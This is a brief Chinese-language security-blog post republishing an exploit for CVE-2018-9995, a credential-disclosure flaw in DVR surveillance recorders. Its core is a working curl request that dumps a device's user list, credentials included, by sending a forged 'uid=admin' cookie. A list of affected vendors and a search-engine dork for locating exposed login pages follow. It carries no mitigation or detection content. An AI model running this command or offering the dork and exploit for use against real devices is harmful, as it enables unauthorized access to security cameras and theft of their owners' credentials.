CVE-2018-9995 Get DVR Credentials Exploit

2018-05-0314:50:45 发表评论

CVE-2018-9995 Get DVR Credentials Exploit 国外的一款监控设备漏洞利用程序。

CVE-2018-9995 Get DVR Credentials Exploit

  1. [*] Exploit Title:       "Gets DVR Credentials"
  2. [*] CVE:                 CVE-2018-9995
  3. [*] CVSS Base Score v3:  7.3 / 10
  4. [*] CVSS Vector String:  CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  5. [*] Date:                09/04/2018
  6. [*] Exploit Author:      Fernandez Ezequiel ( twitter:@capitan_alfa )

Exploit:

  1. $> curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

DVR测试厂商

  1. Novo
  2. CeNova
  3. QSee
  4. Pulnix
  5. XVR 5 in 1 (title: "XVR Login")
  6. Securus,  - Security. Never Compromise !! -
  7. Night OWL
  8. DVR Login
  9. HVR Login
  10. MDVR Login

漏洞测试

  1. intitle:"DVR Login"

CVE-2018-9995 Get DVR Credentials Exploit CVE-2018-9995 Get DVR Credentials Exploit

项目地址

部分内容被隐藏
需登陆后可查看
CE安全网

发表评论

您必须登录才能发表评论!